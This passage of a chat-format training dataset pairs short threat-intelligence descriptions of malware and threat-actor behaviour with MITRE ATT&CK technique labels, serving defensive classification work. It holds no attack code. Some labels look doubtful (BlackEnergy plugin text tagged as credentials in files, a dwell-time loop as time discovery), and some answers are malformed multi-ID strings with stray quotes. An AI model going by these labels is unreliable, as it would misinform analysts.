- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses."
- },
- {
- "role": "assistant",
- "content": "T1568.001 - Fast Flux DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves is launched through use of DLL search order hijacking to load a malicious dll."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SharpStage can execute arbitrary commands with PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom encryption algorithm on data sent back to the C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZLib has sent data and files from a compromised host to its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before evidence of BlackEnergy2 use in targeted attacks was uncovered, we tracked strange activity on one of the BlackEnergy CnC servers in 2013. This strangeness was related to values listed in newer BlackEnergy configuration files. As described in Dmitry’s 2010 Black DDoS’ analysis, a configuration file is downloaded from the server by main.dll on an infected system. The config file provides download instructions for the loader. In this particular case in 2013, the config file included an unknown plugin set, aside from the usual ‘ddos’ plugin listing. Displayed below are these new, xml formatted plugin names “weap_hwi”, “ps”, and “vsnet” in a BlackEnergy configuration file download from a c2 server. This new module push must have been among the first for this group, because all of the module versions were listed as “version 1”, including the ddos plugin"
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX can use RC4 encryption in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADCALL collects the computer name and host name on the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity."
- },
- {
- "role": "assistant",
- "content": "T1218.009 - Signed Binary Proxy Execution: Regsvcs/Regasm"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used several remote administration tools as persistent infiltration channels."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As you can see from the VBScript file, the commands in the script are invoked using the wscript shell. It does two things: it creates a “RunOnce” key in the registry so that the VBScript is executed each time the user logs on the machine (indicating persistence) and second, the VBScript runs the executable file “firefox.exe"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To operate and evade standard analysis tools, most of the functions are hashed. The hashing algorithm has a high degree of similarity to the previous ShellTea version, with a slight modification of the seeds and constants. In this version, the attacker also utilizes functions from ole32 for stream processing"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As our research technique of fingerprinting exploit writers exceeded our initial expectations, we were on the lookout for more exploits to investigate. Soon enough, we came across this blog post from Kaspersky detailing how Sodin (a.k.a Sodinokibi, or REvil), an infamous ransomware, is using a 1-Day exploit for CVE-2018-8453."
- },
- {
- "role": "assistant",
- "content": "T1588.006 - Vulnerabilities', 'T1203 - Exploitation for Client Execution', 'T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShell Cobalt Strike Beacon - New payload + new C2 domain - PowerShell Obfuscator - All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon’s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper - A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper - Inspired by known Outlook credentials dumpers. Mimikatz - PowerShell and Binary versions, with multiple layers of obfuscation"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT has dropped binaries as files named microsoft_network.exe and crome.exe."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "steals credentials stored in Web browsers by querying the sqlite database and leveraging the Windows Vault mechanism."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto presents an input prompt asking for the user's login and password."
- },
- {
- "role": "assistant",
- "content": "T1056.002 - Input Capture: GUI Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before the driver is loaded, the malware disables crash dump by setting the following registry key"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1562.006 - Impair Defenses: Indicator Blocking', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner has used python scripts on the user’s system, as well as the Python variant of the Empire agent, EmPyre."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "netsh can be used to discover system firewall settings."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DropBook can collect the names of all files and folders in the Program Files directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker copies itself into the \"%systemroot%\\system32\" directory and registers as a service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used Base64-encoded strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. Modules used for spreading inside a local network of compromised machines via SMB. It uses the EternalBlue exploit. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is capable of the following functions: Collect file/folder/drive information Download files and additional malware Launch/terminate/enumerate process Update configuration data Delete files Inject code from files to other running process Utilize proxy Open reverse shell Run in passive mode — instead of actively connecting to the command and control (C&C) server, the backdoor will open and listen to a port then receive commands through it Once the backdoor is loaded, it will then load the encrypted configuration file Auditcred.dll.mui/rOptimizer.dll.mui to extract the C&C information and connect to it"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell.dll is injected in a shared SVCHOST process. The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials. WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture. The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt. The actors used the Nltest command to list domain controllers"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can determine when it has been installed on a host for at least 15 days before downloading the final payload."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) QEMU Linux images. 2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To establish persistence, identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1036 - Masquerading', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell can upload files over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This action is repeated until the dwell time value is bigger or equal to the dwell time value for the standby mode"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mailman: communicates with a C&C server to receive commands and writes them to a file. It also sends the file with output from commands to the C&C server."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkVishnya used PowerShell to create shellcode loaders."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cannon can gather system information from the victim’s machine such as the OS version, machine name, and drive information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has disabled event logging on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the computer name and checks the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds Registry Run keys to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors obtained malware, including Remcos, njRAT, and AsyncRAT."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperBro has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit has several modules that search the Windows Registry for stored credentials: \"Get-UnattendedInstallFile\", \"Get-Webconfig\", \"Get-ApplicationHost\", \"Get-SiteListPassword\", \"Get-CachedGPPPassword\", and \"Get-RegistryAutoLogon\"."
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can delete previously created tasks on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1070.009 - Clear Persistence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury sequentially tries the generated domain names until it finds one that has a TXT record set by the operator. To verify the ownership of the domain, Ebury checks whether the TXT record can be decrypted using an RSA public key embedded in its code"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus has compressed data before exfiltrating it using a tool called Abbrevia."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has registered itself as a service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We believe that the threat actors behind the Frankenstein campaign are moderately sophisticated and highly resourceful. The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available solutions, possibly to improve operational security. This report outlines the various anti-detection techniques used throughout the Frankenstein campaign. Some of these techniques included checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the sample was inside of a virtual machine. The threat actors also used different types of encryption in order to protect data in transit"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may collect permission group information by running net group /domain or a series of other commands on a victim."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can get a list of the processes and running tasks on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "spawns a new copy of c:\\windows\\syswow64\\explorer.exe and then replaces the executable code in memory with malware."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Threat Group-3390 tool can use a public UAC bypass method to elevate privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following data collection, has compressed log files into a ZIP archive prior to staging and exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang performs local network connection discovery using \"netstat\"."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use a number of known techniques to bypass Windows UAC."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used application shim databases for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.011 - Event Triggered Execution: Application Shimming"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT has a built-in keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CORESHELL downloads another dropper from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used WMI for execution."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used 7-Zip to decode its Raindrop malware."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook is delivered via a malicious Word document inside a zip file."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3 shows a code excerpt from the embedded macro that checks which base64 blob should be decoded based on the iCheck variable, a Boolean value which is set to true if the victim system is running on a 64-bit system and false on a 32-bit system. If the system is found to be 64-bit, the base64 encoded blob on the left is decoded otherwise the base64 encoded blob on the right is decoded"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a command to collect and exfiltrate emails from Outlook."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use TLS to encrypt its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has collected the hostname of a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "build_downer can extract malware from a downloaded JPEG."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The emails first originated from a spoofed sender that impersonated a Meetings Services Assistant at the United Nations General Assembly Secretariat. The threat actor achieved this impersonation by utilizing the legitimate email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service"
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
